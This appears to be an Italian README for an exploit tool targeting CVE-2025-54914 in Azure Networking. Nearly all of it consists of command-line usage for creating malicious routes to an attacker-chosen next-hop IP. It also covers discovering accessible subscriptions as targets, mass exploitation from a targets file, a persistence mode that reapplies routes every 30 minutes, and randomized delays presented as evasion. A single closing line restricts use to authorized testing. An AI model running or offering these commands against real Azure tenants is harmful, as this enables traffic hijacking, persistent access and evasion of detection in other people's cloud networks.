
Exploit per CVE-2025-54914 in Azure Networking, che crea route dannose con evasione, persistenza, scansione multi-target e reportistica per test di sicurezza autorizzati.
Questa è un'implementazione migliorata dell'exploit CVE-2025-54914 per il routing di rete di Azure. Questa versione mantiene le funzionalità principali della CVE aggiungendo ulteriori caratteristiche tra cui persistenza, elusione, scansione multi-target e gestione degli errori.
# Installa le dipendenze Python
pip install requests
# Installa Azure CLI (per autenticazione)
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
# Rendi eseguibili gli script
chmod +x exploit.py
chmod +x exploit_utils.py
# Autenticati con Azure
az login
# Crea una route su un singolo obiettivo
python exploit.py \
--subscription-id "12345678-1234-1234-1234-123456789012" \
--resource-group "production-rg" \
--vnet-name "prod-vnet" \
--subnet-name "prod-subnet" \
--address-prefix "10.0.1.0/24" \
--next-hop-ip "10.0.2.5"
# Elimina una route
python exploit.py \
--subscription-id "12345678-1234-1234-1234-123456789012" \
--resource-group "production-rg" \
--vnet-name "prod-vnet" \
--subnet-name "prod-subnet" \
--route-name "exploit-route-1" \
--operation delete
# Crea un file di configurazione
python exploit_utils.py discover --output targets.json
# Sfrutta tutti gli obiettivi
python exploit.py --targets-file targets.json --operation create
# Scansiona gli obiettivi senza sfruttarli
python exploit.py --targets-file targets.json --scan-only
# Abilita la persistenza con intervalli di 30 minuti
python exploit.py --targets-file targets.json --persistence-mode --interval 30
# Intervalli di ritardo personalizzati per l'elusione
python exploit.py \
--targets-file targets.json \
--delay-min 1.0 \
--delay-max 5.0 \
--max-workers 5
# Test senza sfruttamento reale
python exploit.py --targets-file targets.json --dry-run
# Abilita il logging di debug
python exploit.py \
--targets-file targets.json \
--log-level DEBUG \
--log-file exploit.log
{
"targets": [
{
"subscription_id": "12345678-1234-1234-1234-123456789012",
"resource_group": "production-rg",
"vnet_name": "prod-vnet",
"subnet_name": "prod-subnet",
"route_name": "exploit-route-1",
"address_prefix": "10.0.1.0/24",
"next_hop_type": "VirtualAppliance",
"next_hop_ip": "10.0.2.5",
"api_version": "2025-09-01",
"priority": 1
}
],
"metadata": {
"description": "Target configuration for CVE-2025-54914",
"created": "2025-01-09",
"version": "1.0"
}
}
# Token di accesso ad Azure (alternativa ad Azure CLI)
export AZURE_ACCESS_TOKEN="your_token_here"
# Livello di log
export LOG_LEVEL="INFO"
# Scopri tutti gli obiettivi accessibili
python exploit_utils.py discover --output discovered_targets.json
# Scopri sottoscrizioni specifiche
python exploit_utils.py discover \
--subscription-ids "sub1" "sub2" \
--output targets.json \
--report discovery_report.txt
# Genera la configurazione dell'exploit dagli obiettivi scoperti
python exploit_utils.py config \
--input discovered_targets.json \
--output exploit_config.json \
--address-prefix "10.0.1.0/24" \
--next-hop-ip "10.0.2.5"
# Analizza gli obiettivi per la valutazione del rischio
python exploit_utils.py analyze \
--input targets.json \
--output vulnerability_report.txt
--dry-run--max-workers in base alla capacità del sistema# Riautenticati con Azure
az login
# Controlla l'account corrente
az account show
# Elenca le sottoscrizioni accessibili
az account list
# Controlla i permessi richiesti
az role assignment list --assignee $(az account show --query user.name -o tsv)
# Testa la connettività
curl -I https://management.azure.com
# Controlla le impostazioni proxy
echo $HTTP_PROXY
echo $HTTPS_PROXY
# Abilita il logging dettagliato
python exploit.py --log-level DEBUG --log-file debug.log
# Controlla il file di log
tail -f debug.log
⚠️ IMPORTANTE: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati.
Questo progetto è concesso in licenza per uso esclusivamente di ricerca e didattico. L'uso commerciale richiede autorizzazione esplicita.
Per problemi e domande: